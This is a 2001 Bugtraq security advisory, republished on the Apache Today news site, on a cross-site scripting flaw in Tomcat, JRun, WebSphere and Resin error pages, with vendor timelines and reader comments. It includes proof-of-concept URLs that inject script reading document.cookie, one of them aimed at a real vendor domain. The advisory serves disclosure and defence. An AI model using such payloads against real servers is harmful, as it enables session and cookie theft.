Your Daily Source for Apache News and Information  
Breaking News Preferences Contribute Triggers Link Us Search About
Apache Today [Your Apache News Source] To internet.com

Free trial with SiteScope. $10 Amazon Certificate.

Apache HTTPD Links
Apache Project
The Apache Software Foundation
PHP Server Side Scripting
Apache XML Project
The Apache FAQ
The Java Apache Project
Apache Module Registry
The Jakarta Project
Apache-Perl Integration Project
Apache-Related Projects
ApacheCon
The Linux Channel at internet.com
All Linux Devices
Linux Central
Enterprise Linux Today
Linux Apps
Linux Today
BSD Central
BSD Today
Linuxnewbie.org
Linux Planet
Just Linux
PHPBuilder
Apache Today
Linux Start
Linux Programming
SITE DESCRIPTIONS
Bugtraq: Java servlet cross-site scripting vulnerability
Jul 2, 2001, 16 :43 UTC (4 Talkback[s]) (7128 reads)

Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
=========================================================================

Affected products:
=================
  Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
     <http://jakarta.apache.org/tomcat/>
  JRun 3.0
     <http://www.allaire.com/products/jrun/index.cfm>
  WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
     <http://www-4.ibm.com/software/webservers/>
  Resin
     <http://www.caucho.com/products/resin/>


Not affected:
============
  Unknown


Problem:
=======
  Accessing the following URLs, the JavaScript code will be executed
  in the browser on the server's domain.

  Tomcat 3.2.1:
    http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  JRun 3.0:
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml
  WebSphere 3.5 FP2:
    http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>
  WebSphere 3.02:
    http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  VisualAge for Java 3.5 Professional:
    http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>
  Resin 1.2.2:
    http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

  These pages produce output like this:
  =================================================
  Error 404
  An error has occurred while processing request:
  http://WebSphere/webapp/examples/******
 
  Message: File not found: file://******
  StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
          at javax.servlet.ServletException.<init>(ServletException.java:107)
          at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
          at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
          at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
          ...
  =================================================
  ******: The JavaScript code is executed here.

  This vulnerability is quite similar to "IIS cross-site scripting
  vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
  <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>


Impact:
======
  For the detail about cross-site scripting, see the following pages.
  <http://www.cert.org/advisories/CA-2000-02.html>
  <http://www.microsoft.com/TechNet/security/crssite.asp>
  <http://www.apache.org/info/css-security/>


Vendor status:
=============

  Tomcat:
  ======
    Notified:
      16 Mar 2001 04:32:02 +0900,
      17 Mar 2001 18:55:45 +0900,
    Response:
      17 Mar 2001 20:07:42 -0000
    Fix:
      30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
      11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
    Announcement:
      <http://jakarta.apache.org/tomcat/news.html>

      Sun Microsystems does not publish Tomcat vulnerabilities.
      <http://java.sun.com/products/jsp/tomcat/>
      <http://java.sun.com/sfaq/chronology.html>

  JRun:
  ====
    Notified:
      13 Mar 2001 23:11:54 +0900,
    Response:
      13 Mar 2001 09:43:49 -0500
      14 Mar 2001 09:05:03 -0500
    Fix:
      28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
    Announcement:
      <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
      Macromedia Product Security Bulletin (MPSB01-06)
      JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
      (a.k.a. JavaScript code execution vulnerability)

  WebSphere:
  =========
    Notified:
      20 Mar 2001 08:13:30 +0900, *******@us.ibm.com
    Response:
      22 Mar 2001 09:14:01 -0500
      23 Mar 2001 00:02:58 +0900
    Fix:
      PQ47386V302x (?)
      <http://www-4.ibm.com/software/webservers/appserv/efix.html>
    Announcement:
      <http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
      (in Japanese)

  Resin:
  =====
    Notified:
      16 Mar 2001 02:26:47 +0900, ,
    Response:
      None
    Fix:
      Unknown
    Announcement:
      Unknown
      http://www.caucho.com/products/resin/changes.xtp

Workaround:
==========
  Customize error pages.


--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/

  Current Newswire:
Daemon News: Jakarta-Tomcat on FreeBSD 4.4

Moto, a compilable server-side scripting language

SECURITY: Flaws Found in PHP Leave Web Servers Open to Attack

Everything Solaris: Apache: Handling Traffic

LinuxEasyInstaller 2.0 final release

Apache 2.0.32 beta is available

Everything Solaris: Apache: The Basics

Apache Jakarta James Mailserver v2.0a2 Released

PostgreSQL v7.2 Final Release

Daemon News: Multiple webservers behind one IP address

 Talkback(s) Name  Date
See subject: I just tested this exploit and it doesn&#39;t work. I get "Forbidde ...   It doesn't work with my Tomcat 3.2.1   
  Jul 3, 2001, 03:43:57
http://www.orionserver.com/ alert(document.cookie) .jspgives the following outpu ...   Not-Affected : orion   
  Jul 6, 2001, 06:06:12
hi!i&#39;ve been using tomcat to run my servlets,jsp and beans. i&#39;m pretty c ...   how to use servlets,jsp,beans,ejb with apache not tomcat.   
  Jul 29, 2001, 16:10:11
Is Jserv affected? Or do you have to run JSP?Ben Ricker ...   Jserv Affected?   
  Aug 24, 2001, 16:22:55
Enter your comments below.
Your Name: Your Email Address:


Subject: CC: [will also send this talkback to an E-Mail address]
Comments:

See our talkback-policy for or guidelines on talkback content.

About Triggers Media Kit Security Triggers Login


All times are recorded in UTC.
Linux is a trademark of Linus Torvalds.
Powered by Linux 2.4, Apache 1.3, and PHP 4
Copyright 2002 INT Media Group, Incorporated All Rights Reserved.
Legal Notices,  Licensing, Reprints, & Permissions,  Privacy Policy.
http://www.internet.com/